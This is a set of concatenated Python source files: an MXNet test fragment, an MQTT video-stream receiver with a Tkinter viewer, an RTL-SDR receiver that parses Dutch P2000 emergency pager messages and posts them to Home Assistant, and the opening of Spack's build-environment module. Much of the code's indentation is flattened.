ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
    for active in [True, False]:
        with mx.np_shape(active=active):
            check_concat((0, 3, 4), (5, 3, 4), 0)
            check_concat((8, 0, 5), (8, 7, 5), 1)
            check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
if __name__ == '__main__':
import nose
nose.runmodule()
|
stream_reciver.py
|
import time
import logging
import json
from tkinter.constants import NW
import tkinter as tk
import base64
import numpy as np
import cv2
from PIL import Image, ImageTk
from mqtt_client import MqttClient
from threading import Thread
FPS = 30
CHANNELS = 1
RATE = 44100
MQTT_BROKER = "mqtt.item.ntnu.no"
MQTT_PORT = 1883
MQTT_TOPIC_RECIVER = "ttm4115/team_1/project/reciver"
class StreamVideoReciver:
def __init__(self, name):
self.number = name[-1]
self.name = "office" + str(self.number) + "reciver"
self.active = False
self.framesaudio = []
self.recivefrom = None
        # get the logger object for the component
self._logger = logging.getLogger(__name__)
print("logging under name {}.".format(__name__))
self._logger.info("Starting Component")
# create a new MQTT client
self._logger.debug("Connecting to MQTT broker {} at port {}".format(MQTT_BROKER, MQTT_PORT))
self.mqtt_client = MqttClient("StreamReciver" + self.name)
self.mqtt_client.on_connect = self.on_connect
self.mqtt_client.on_message = self.on_message
self.mqtt_client.connect(MQTT_BROKER, MQTT_PORT)
self.mqtt_client.subscribe(MQTT_TOPIC_RECIVER)
        # loop_start() already spawns its own network thread, so there is no
        # need to wrap it in another Thread
        self.mqtt_client.loop_start()
# for tkinter
self.frame = None
self.started_stream = False
self.canvas = None
self.filter_frame = None
self.height = None
self.width = None
self.showing = False
    def on_connect(self, client, userdata, flags, rc):
"""
Callback when connected to MQTT
"""
self._logger.debug("MQTT connected to {}".format(client))
def load_json(self, msg):
"""
Deserialize JSON string
"""
try:
data = json.loads(msg.payload.decode("utf-8"))
except Exception as err:
self._logger.error('Message sent to topic {} had no valid JSON. Message ignored. {}'.format(msg.topic, err))
return
return data
def on_message(self, client, userdata, msg):
"""
        Callback when receiving a message on a subscribed topic through MQTT
"""
        if msg.topic == MQTT_TOPIC_RECIVER:
            data = self.load_json(msg)
            if data is None:
                return
            if data["command"] == "streamstart" and data["reciver"] == self.name:
self.recivefrom = data["answer"]
self.mqtt_client.subscribe("ttm4115/team_1/project/camera" + self.recivefrom[-1])
self.active = True
elif data["command"] == "streamstop" and data["reciver"] == self.name:
self.active = False
self.mqtt_client.unsubscribe("ttm4115/team_1/project/camera" + self.recivefrom[-1])
self.recivefrom = None
self.framesaudio = []
cv2.destroyAllWindows()
if self.recivefrom is not None:
if msg.topic == "ttm4115/team_1/project/camera" + self.recivefrom[-1]:
                data = self.load_json(msg)
                if data is None:
                    return
                if data["command"] == "streamvideo" and data["reciver"] == self.name and self.active:
framevideo = self.bts_to_frame(data["answer"])
self.frame = framevideo
self.start_stream()
def bts_to_frame(self, b64_string):
"""
        Convert a base64 string to an image frame
"""
base64_bytes = b64_string.encode("utf-8")
buff = np.frombuffer(base64.b64decode(base64_bytes), np.uint8)
img = cv2.imdecode(buff, cv2.IMREAD_COLOR)
return img
def set_canvas(self, canvas, height, width, gui_frame):
"""
Set the canvas, and the height and width
"""
self.canvas = canvas
self.height = height
self.width = width
self.gui_frame = gui_frame
def set_is_showing(self, is_showing):
"""
        Set whether the filter menu is showing
"""
self.showing = is_showing
def start(self):
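        # Keep the process alive; all real work happens in the MQTT callbacks.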
while True:
time.sleep(0.001)
def start_stream(self):
"""
Start the video stream
"""
if not self.started_stream:
self.started_stream = True
self.show_stream()
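    # show_stream draws the newest frame and reschedules itself on the Tk event
    # loop every 10 ms, so start_stream only needs to kick it off once.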
def show_stream(self):
"""
Show the stream to the screen
"""
frame = cv2.resize(self.frame, (self.width, self.height))
self.image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # to RGB
self.image = Image.fromarray(self.image) # to PIL format
self.image = ImageTk.PhotoImage(self.image) # to ImageTk format
# Update image
if self.showing:
self.create_filter_page(self.gui_frame)
else:
if self.filter_frame is not None:
self.filter_frame.destroy()
self.filter_frame = None
self.canvas.create_image(0, 0, anchor=NW, image=self.image)
self.canvas.after(10, self.show_stream)
def create_filter_page(self, parent_frame: tk.Frame):
"""
Initializes the filter page
"""
filters = ['dog', 'glasses', 'easter', 'lofoten', 'vacation', ]
if self.filter_frame is None:
self.filter_frame = tk.Frame(parent_frame, bg='black')
self.filter_frame.place(x=self.width / 2, y=self.height / 8, anchor=tk.CENTER)
current = 'misc'
for index in range(len(filters)):
if current == filters[index]:
button1 = tk.Label(self.filter_frame, text=filters[index], bg='grey', fg='white',
font=("Helvetica", 40),
borderwidth=10, relief=tk.GROOVE, )
button1.grid(row=0, column=index, padx=10, pady=10)
else:
button1 = tk.Label(self.filter_frame, text=filters[index], bg='grey', fg='white',
font=("Helvetica", 40))
button1.grid(row=0, column=index, padx=10, pady=10)
|
p2000.py
|
#!/usr/bin/env python3
"""RTL-SDR P2000 Receiver for Home Assistant."""
# See README for installation instructions
import calendar
import configparser
import fnmatch
import json
import os
import re
import subprocess
import sys
import threading
import time
import logging
from datetime import datetime
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
import paho.mqtt.client as mqtt
import requests
from opencage.geocoder import OpenCageGeocode, InvalidInputError, RateLimitExceededError, UnknownError
VERSION = "0.0.6"
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
        # Note: do not call super().doRollover() here; this override reimplements
        # the whole rollover, and running the parent version first would rotate
        # the file twice and discard the freshly rotated log.
        self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, datadir, logstokeep, debug_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
u"%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
u"%(asctime)s - (%(threadName)-10s) - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/p2000.log", backupCount=logstokeep
)
# file_handle.setLevel(logging.DEBUG)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
        console_handle.setLevel(logging.DEBUG)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
def info(self, message):
"""Info level."""
self.log(message, "info")
def warning(self, message):
"""Warning level."""
self.log(message, "warning")
def error(self, message):
"""Error level."""
self.log(message, "error")
def debug(self, message):
"""Debug level."""
self.log(message, "debug")
class MessageItem:
"""Contains all the Message data."""
def __init__(self):
        self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        self.message_raw = ""
self.timereceived = time.monotonic()
self.groupid = ""
self.receivers = ""
self.capcodes = []
self.body = ""
self.location = ""
self.postcode = ""
self.city = ""
self.address = ""
self.street = ""
self.region = ""
self.priority = 0
self.disciplines = ""
self.remarks = ""
self.longitude = ""
self.latitude = ""
self.opencage = ""
self.mapurl = ""
self.friendly_name = "P2000 SDR"
self.is_posted = False
def load_config(filename):
"""Create default or load existing config file."""
config = configparser.ConfigParser()
if config.read(filename):
return config
config["main"] = {"debug": False}
config["rtl-sdr"] = {
"cmd": "rtl_fm -f 169.65M -M fm -s 22050 | multimon-ng -a FLEX -t raw -"
}
config["home-assistant"] = {
"enabled": True,
"baseurl": "http://homeassistant.local:8123",
"token": "Place your Long-Lived Access Token here",
"sensorname": "p2000",
}
config["mqtt"] = {
"enabled": False,
"mqtt_server": "192.168.1.100",
"mqtt_port": 1883,
"mqtt_user": "mqttuser",
"mqtt_password": "somepassword",
"mqtt_topic": "p2000",
}
config["opencage"] = {
"enabled": False,
"token": "Place your OpenCage API Token here",
}
    with open(filename, "w") as configfile:
        config.write(configfile)
return False
def check_requirements(self):
"""Check if required software is installed."""
self.logger.info("Checking if required software is installed")
# Check if rtl_fm is installed
process = subprocess.Popen(
"rtl_fm", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Wait for the process to finish
dummy, err = process.communicate()
error_str = err.decode("utf8")
if "not found" in error_str or "not recognized" in error_str:
self.logger.debug("rtl_fm command not found, please install RTL-SDR software")
return False
self.logger.debug("rtl_fm is found")
# Check if multimon-ng is installed
process = subprocess.Popen(
"multimon-ng -h", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Wait for the process to finish
dummy, err = process.communicate()
error_str = err.decode("utf8")
if "not found" in error_str:
self.logger.error("multimon-ng not found, please install the multimon-ng package")
return False
self.logger.debug("multimon-ng is found")
return True
def load_capcodes_dict(self, filename):
"""Load capcodes to dictionary."""
capcodes = {}
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as csv_file:
csv_list = [
[val.strip() for val in r.split(",")] for r in csv_file.readlines()
]
(_, *header), *data = csv_list
for row in data:
key, *values = row
                    capcodes[key] = {field: value for field, value in zip(header, values)}
self.logger.info("{} records loaded".format(len(capcodes)))
except KeyError:
self.logger.error(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.info(f"Could not open/read file: {filename}, ignoring filter")
return capcodes
def load_capcodes_filter_dict(self, filename):
"""Load capcodes ignore or match data to dictionary."""
capcodes = dict()
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as text_file:
lines = text_file.readlines()
for item in lines:
if item[0] == "#":
continue
fields = item.split(",")
if len(fields) == 2:
capcodes[fields[0].strip()] = fields[1].strip()
elif len(fields) == 1:
capcodes[fields[0].strip()] = "NO DESCR"
self.logger.info("{} records loaded".format(len(capcodes)))
return capcodes
except KeyError:
self.logger.debug(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.debug(f"Could not open/read file: {filename}, ignoring filter")
return capcodes
def load_list(self, filename):
"""Load data in list."""
tmplist = []
try:
self.logger.info("Loading data from '{}'".format(filename))
with open(filename, "r") as text_file:
lines = text_file.readlines()
lines_strip = map((lambda line: line.strip()), lines)
tmplist = list(
filter(
lambda line: len(line) > 0
and line[0:1] != "#"
and line[0:1] != ";",
lines_strip,
)
)
self.logger.info("{} records loaded".format(len(tmplist)))
return tmplist
except KeyError:
self.logger.debug(f"Could not parse file contents of: {filename}")
except OSError:
self.logger.debug(f"Could not open/read file: {filename}")
return tmplist
def check_filter(mylist, text):
"""Check filter data."""
# If list is not loaded or empty allow all
if len(mylist) == 0:
return True
# Check if text applied matches at least one filter
for f_str in mylist:
if fnmatch.fnmatch(text, f_str):
return True
return False
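# Example: check_filter(["*Vlaardingen*"], "A2 AMBU 17106 ... Vlaardingen") is
# True, since fnmatch applies shell-style wildcard matching to the message text.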
def to_local_datetime(utc_dt):
"""Convert utc to local time."""
time_tuple = time.strptime(utc_dt, "%Y-%m-%d %H:%M:%S")
return time.ctime(calendar.timegm(time_tuple))
def p2000_get_prio(message):
"""Look for priority strings and return level."""
priority = 0
regex_prio1 = r"^A\s?1|\s?A\s?1|PRIO\s?1|^P\s?1"
regex_prio2 = r"^A\s?2|\s?A\s?2|PRIO\s?2|^P\s?2"
regex_prio3 = r"^B\s?1|^B\s?2|^B\s?3|PRIO\s?3|^P\s?3"
regex_prio4 = r"^PRIO\s?4|^P\s?4"
if re.search(regex_prio1, message, re.IGNORECASE):
priority = 1
elif re.search(regex_prio2, message, re.IGNORECASE):
priority = 2
elif re.search(regex_prio3, message, re.IGNORECASE):
priority = 3
elif re.search(regex_prio4, message, re.IGNORECASE):
priority = 4
return priority
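# Example: a message starting with "A2 " matches regex_prio2 above, so
# p2000_get_prio("A2 AMBU 17106 Schiedamseweg") returns 2.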
# Init logging
logger = Logger("/home/pi/RTL-SDR-P2000Receiver-HA/", 7, True)
class Main:
"""Main class, start of application."""
def __init__(self):
self.running = True
self.messages = []
# Init logging
self.logger = logger
cfgfile = "config.ini"
# Load configuration
self.config = load_config(cfgfile)
if self.config:
self.logger.info(f"Loading configuration from '{cfgfile}'")
else:
self.logger.info(f"Created config file '{cfgfile}', edit it and restart the program.")
self.debug = self.config.getboolean("main", "debug")
# Set current folder so we can find the config files
os.chdir(os.path.dirname(os.path.abspath(__file__)))
self.logger.info(f"RTL-SDR P2000 Receiver for Home Assistant Version {VERSION}")
self.logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
# Check if required software is installed
if not check_requirements(self):
self.logger.error("Application stopped, required software was not found!")
sys.exit(0)
self.rtlfm_cmd = self.config.get("rtl-sdr", "cmd")
self.use_hass = self.config.getboolean("home-assistant", "enabled")
self.baseurl = self.config.get("home-assistant", "baseurl")
self.token = self.config.get("home-assistant", "token")
self.sensorname = self.config.get("home-assistant", "sensorname")
self.use_mqtt = self.config.getboolean("mqtt", "enabled")
self.mqtt_server = self.config.get("mqtt", "mqtt_server")
self.mqtt_port = int(self.config.get("mqtt", "mqtt_port"))
self.mqtt_username = self.config.get("mqtt", "mqtt_user")
self.mqtt_password = self.config.get("mqtt", "mqtt_password")
self.mqtt_topic = self.config.get("mqtt", "mqtt_topic")
self.use_opencage = self.config.getboolean("opencage", "enabled")
self.opencagetoken = self.config.get("opencage", "token")
self.opencage_disabled = False
# Load capcodes data
self.capcodes = load_capcodes_dict(self, "db_capcodes.txt")
# Load plaatsnamen data
self.plaatsnamen = load_list(self, "db_plaatsnamen.txt")
# Load plaatsnamen afkortingen data
self.pltsnmn = load_capcodes_dict(self, "db_pltsnmn.txt")
# Load capcodes ignore data
self.ignorecapcodes = load_capcodes_filter_dict(self, "ignore_capcodes.txt")
# Load text ignore data
self.ignoretext = load_list(self, "ignore_text.txt")
# Load match text filter data
self.matchtext = load_list(self, "match_text.txt")
# Load match capcodes filter data
self.matchcapcodes = load_capcodes_filter_dict(self, "match_capcodes.txt")
# Start thread to get data from RTL-SDR stick
data_thread = threading.Thread(name="DataThread", target=self.data_thread_call)
data_thread.start()
# Start thread to post messages to Home Assistant
post_thread = threading.Thread(name="PostThread", target=self.post_thread_call)
post_thread.start()
# Run the wait loop
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
break
# Application is interrupted and is stopping
self.running = False
self.logger.info("Application stopped")
def post_data(self, msg):
"""Post data to Home Assistant via Rest API and/or MQTT topic."""
data = {
"state": msg.body,
"attributes": {
"time received": msg.timestamp,
"group id": msg.groupid,
"receivers": msg.receivers,
"capcodes": msg.capcodes,
"priority": msg.priority,
"disciplines": msg.disciplines,
"raw message": msg.message_raw,
"region": msg.region,
"location": msg.location,
"postcode": msg.postcode,
"city": msg.city,
"address": msg.address,
"street": msg.street,
"remarks": msg.remarks,
"longitude": msg.longitude,
"latitude": msg.latitude,
"opencage": msg.opencage,
"mapurl": msg.mapurl,
"friendly_name": msg.friendly_name
},
}
if self.use_hass:
try:
self.logger.debug("Posting to Home Assistant")
headers = {
"Authorization": "Bearer " + self.token,
"content-type": "application/json",
}
response = requests.post(
self.baseurl + "/api/states/sensor." + self.sensorname,
headers=headers,
data=json.dumps(
data, default=lambda o: o.__dict__, sort_keys=True, indent=4
),
)
response.raise_for_status()
self.logger.debug(f"POST data: {data}")
self.logger.debug(f"POST status: {response.status_code} {response.reason}")
self.logger.debug(f"POST text: {response.text}")
self.logger.debug(f"OpenCage status: {msg.opencage}")
except requests.HTTPError:
self.logger.error(
f"HTTP Error while trying to post data, check baseurl and token in config.ini: {response.status_code} {response.reason}"
)
except requests.exceptions.SSLError as err:
self.logger.error(
f"SSL Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
)
except requests.exceptions.ConnectionError as err:
self.logger.error(
f"Connection Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
)
finally:
# Mark as posted to prevent race conditions
msg.is_posted = True
if self.use_mqtt:
try:
self.logger.debug("Posting to MQTT")
data = json.dumps(data)
client = mqtt.Client()
client.username_pw_set(self.mqtt_username, self.mqtt_password)
client.connect(self.mqtt_server, self.mqtt_port, 60)
client.publish(self.mqtt_topic, data)
client.disconnect()
self.logger.debug(
f"MQTT status: Posting to {self.mqtt_server}:{self.mqtt_port} topic:{self.mqtt_topic}"
)
self.logger.debug(f"MQTT json: {data}")
finally:
# Mark as posted to prevent race conditions
msg.is_posted = True
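    # Illustrative payload sketch (not part of the original): the JSON body
    # built by post_data() above, with made-up values, as Home Assistant or
    # an MQTT subscriber would receive it:
    #
    #   {"state": "A1 Hoofdstraat 1234AB Amsterdam",
    #    "attributes": {"priority": 1, "city": "Amsterdam",
    #                   "latitude": "52.37", "longitude": "4.89", ...}}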
def data_thread_call(self):
"""Thread for parsing data from RTL-SDR."""
self.logger.info(f"RTL-SDR process started with: {self.rtlfm_cmd}")
multimon_ng = subprocess.Popen(
self.rtlfm_cmd, stdout=subprocess.PIPE, shell=True
)
try:
while self.running:
# Read line from process
line = multimon_ng.stdout.readline()
try:
line = line.decode("utf8", "backslashreplace")
# self.logger.debug(line)
except UnicodeDecodeError:
self.logger.debug(f"Error while decoding utf8 string: {line}")
line = ""
multimon_ng.poll()
                if line.startswith("FLEX") and "ALN" in line:
line_data = line.split("|")
timestamp = line_data[1]
groupid = line_data[3].strip()
capcodes = line_data[4].strip()
message = line_data[6].strip()
priority = p2000_get_prio(message)
location = ""
postcode = ""
city = ""
address = ""
street = ""
longitude = ""
latitude = ""
opencage = ""
mapurl = ""
friendly_name = "P2000 SDR"
self.logger.debug(line.strip())
# Get address info if any, look for valid postcode and get the two words around them
# A2 (DIA: ja) AMBU 17106 Schiedamseweg 3134BA Vlaardingen VLAARD bon 8576
regex_address = r"(\w*.) ([1-9][0-9]{3}[a-zA-Z]{2}) (.\w*)"
addr = re.search(regex_address, message)
if addr:
street = addr.group(1)
postcode = addr.group(2)
city = addr.group(3)
address = f"{street} {postcode} {city}"
                        # Remove the uppercase city abbreviation from the message (when a postcode is found)
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
message = re.sub(afkorting, "", message)
# Try to get city only when there is one after a prio
# A1 Breda
else:
regex_prio_loc = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2) (.\w*)"
loc = re.search(regex_prio_loc, message)
if loc and loc.group(2) in self.plaatsnamen:
city = loc.group(2)
else:
                            # Find all uppercase words and check if there is a valid city name among them
# A2 Ambulancepost Moordrecht Middelweg MOORDR V
regex_afkortingen = "[A-Z]{2,}"
afkortingen = re.findall(regex_afkortingen, message)
for afkorting in afkortingen:
if afkorting in self.pltsnmn:
city = self.pltsnmn[afkorting]["plaatsnaam"]
# If uppercase city is found, grab first word before that city name, likely to be the street
regex_address = rf"(\w*.) ({afkorting})"
addr = re.search(regex_address, message)
if addr:
street = addr.group(1)
address = f"{street} {city}"
# Change uppercase city to normal city in message
message = re.sub(afkorting, city, message)
                    # If no address was found, make an educated guess
                    if not address:
                        # Strip all status info from the message
                        regex_messagestrip = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2|^PRIO\s?3|^P\s?3|^PRIO\s?4|^P\s?4)(\W\d{2,}|.*(BR)\b|)|(rit:|rit|bon|bon:|ambu|dia|DIA)\W\d{5,8}|\b\d{5,}$|( : )|\(([^\)]+)\)( \b\d{5,}|)|directe (\w*)|(-)+"
                        strip = re.sub(regex_messagestrip, "", message, flags=re.I)
                        # Strip leading and trailing whitespace from the message
                        regex_doublespaces = r"(^[ \t]+|[ \t]+$)"
                        strip = re.sub(regex_doublespaces, "", strip)
                        # Strip duplicated words from the message
                        regex_doublewords = r"(\b\S+\b)(?=.*\1)"
                        strip = re.sub(regex_doublewords, "", strip)
                        # Search the leftover message for a city matching the city list
for plaatsnaam in self.plaatsnamen:
if plaatsnaam in strip:
self.logger.debug("City found: " + plaatsnaam)
# find first word left from city
regex_plaatsnamen_strip = rf"\w*.[a-z|A-Z] \b{plaatsnaam}\b"
plaatsnamen_strip = re.search(regex_plaatsnamen_strip, strip)
if plaatsnamen_strip:
addr = plaatsnamen_strip.group(0)
                                    # Strip remaining non-address symbols
                                    regex_plaatsnamen_strip_strip = r"(- )|(\w[0-9] )"
                                    addr = re.sub(regex_plaatsnamen_strip_strip, "", addr)
                                    address = addr
                                    city = plaatsnaam
                                    self.logger.debug("Address found: " + plaatsnamen_strip.group(0))
if not check_filter(self.matchtext, message):
self.logger.debug(
f"Message '{message}' ignored (didn't match match_text)"
)
else:
if check_filter(self.ignoretext, message):
self.logger.debug(
f"Message '{message}' ignored (matched ignore_text)"
)
else:
# There can be several capcodes in one message
ignorematch = True
ignore = False
for capcode in capcodes.split(" "):
# Apply filter
if (
capcode in self.matchcapcodes
and self.matchcapcodes
):
self.logger.debug(
f"Capcode '{capcode}' found in '{self.matchcapcodes}' (capcode in match_capcodes)"
)
ignorematch = False
break
else:
self.logger.debug(
f"Capcode '{capcode}' not found in '{self.matchcapcodes}'"
)
continue
if (
capcode in self.ignorecapcodes
and self.ignorecapcodes and (len(capcodes.split(" ")) == 1)
):
self.logger.debug(
f"Message '{message}' ignored because msg contains only one capcode '{capcode}' which is found in '{self.ignorecapcodes}' (capcode in ignore_capcodes)")
ignore = True
break
if ignorematch:
self.logger.debug(
f"Message '{message}' ignored because none of the capcodes '{capcodes}' where found in '{self.matchcapcodes}' (didn't match match_capcodes)"
)
                            if not ignore and not ignorematch:
for capcode in capcodes.split(" "):
# Get data from capcode, if exist
if (
capcode in self.capcodes
and capcode not in self.ignorecapcodes
):
receiver = "{} ({})".format(
self.capcodes[capcode]["description"],
capcode,
)
discipline = "{} ({})".format(
self.capcodes[capcode]["discipline"],
capcode,
)
region = self.capcodes[capcode]["region"]
location = self.capcodes[capcode]["location"]
remark = self.capcodes[capcode]["remark"]
else:
receiver = capcode
discipline = ""
region = ""
remark = ""
# If this message was already received, only add extra info
if (
len(self.messages) > 0
and self.messages[0].body == message
):
if self.messages[0].receivers == "":
self.messages[0].receivers = receiver
elif receiver:
self.messages[0].receivers += (
", " + receiver
)
if self.messages[0].disciplines == "":
self.messages[0].disciplines = discipline
elif discipline:
self.messages[0].disciplines += (
", " + discipline
)
if self.messages[0].remarks == "":
self.messages[0].remarks = remark
elif remark:
self.messages[0].remarks += ", " + remark
if self.messages[0].region == "":
self.messages[0].region = region
self.messages[0].capcodes.append(capcode)
self.messages[0].location = location
self.messages[0].postcode = postcode
self.messages[0].city = city
self.messages[0].street = street
self.messages[0].address = address
else:
                                        # Shortly after midnight (UTC), re-enable OpenCage lookups
                                        now_utc = datetime.utcnow()
                                        if now_utc.hour == 0 and 1 <= now_utc.minute < 15:
                                            self.opencage_disabled = False
                                        # If an address was found and OpenCage is enabled, look up GPS coordinates
                                        if address and self.use_opencage and not self.opencage_disabled:
geocoder = OpenCageGeocode(
self.opencagetoken
)
try:
gps = geocoder.geocode(
address, countrycode="nl"
)
gpscheck = True
if gps:
latitude = gps[0]["geometry"]["lat"]
longitude = gps[0]["geometry"]["lng"]
mapurl = gps[0]["annotations"]["OSM"]["url"]
self.logger.debug(f"OpenCage results: {latitude}, {longitude}, {mapurl}")
else:
latitude = ""
longitude = ""
mapurl = ""
# Rate-error check from opencage
except RateLimitExceededError as rle:
self.logger.error(rle)
# Over rate, opencage check disabled
if rle:
self.opencage_disabled = True
except InvalidInputError as ex:
self.logger.error(ex)
else:
gpscheck = False
opencage = f"enabled: {self.use_opencage} ratelimit: {self.opencage_disabled} gps-checked: {gpscheck}"
msg = MessageItem()
msg.groupid = groupid
msg.receivers = receiver
msg.capcodes = [capcode]
msg.body = message
msg.message_raw = line.strip()
msg.disciplines = discipline
msg.priority = priority
msg.region = region
msg.location = location
msg.postcode = postcode
msg.longitude = longitude
msg.latitude = latitude
msg.city = city
msg.street = street
msg.address = address
msg.remarks = remark
msg.opencage = opencage
msg.mapurl = mapurl
msg.timestamp = to_local_datetime(timestamp)
msg.is_posted = False
msg.friendly_name = "P2000 SDR"
self.messages.insert(0, msg)
# Limit the message list size
if len(self.messages) > 100:
self.messages = self.messages[:100]
except KeyboardInterrupt:
os.kill(multimon_ng.pid, 9)
self.logger.debug("Data thread stopped")
# Thread for posting data to Home Assistant
def post_thread_call(self):
"""Thread for posting data."""
self.logger.debug("Post thread started")
while True:
            if not self.running:
                break
now = time.monotonic()
for msg in self.messages:
if msg.is_posted is False and now - msg.timereceived >= 1.0:
self.post_data(msg)
time.sleep(1.0)
self.logger.debug("Post thread stopped")
# Start application
Main()
|
build_environment.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
   the package's module scope. This allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import iteritems
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.store
from spack.util.string import plural
from spack.util.environment import EnvironmentModifications, validate
from spack.util.environment import preserve_environment
from spack.util.environment import env_flag, filter_system_paths, get_path
from spack.util.environment import system_dirs
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_DEPENDENCIES = 'SPACK_DEPENDENCIES'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
